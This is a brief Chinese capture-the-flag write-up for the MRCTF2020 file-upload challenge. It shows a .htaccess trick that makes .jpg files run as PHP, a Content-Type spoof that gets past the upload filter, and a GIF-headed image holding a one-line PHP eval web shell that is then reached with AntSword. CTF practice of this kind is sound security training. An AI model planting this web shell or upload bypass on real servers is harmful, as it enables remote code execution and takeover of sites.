[MRCTF2020]你传你🐎呢
[MRCTF2020]你传你🐎呢
和.user.ini那道题有异曲同工之处,[SUCTF 2019]CheckIn
提前上传一个.htaccess
文件,注意上传的时候要把Content-Type改为image/jpeg
才能绕过成功上传。
SetHandler application/x-httpd-php
然后上传shell.jpg,内容为:
GIF89a
<script language='php'>@eval($_POST['cmd']);</script>
然后用这个jpg的地址连接蚁剑
得到flag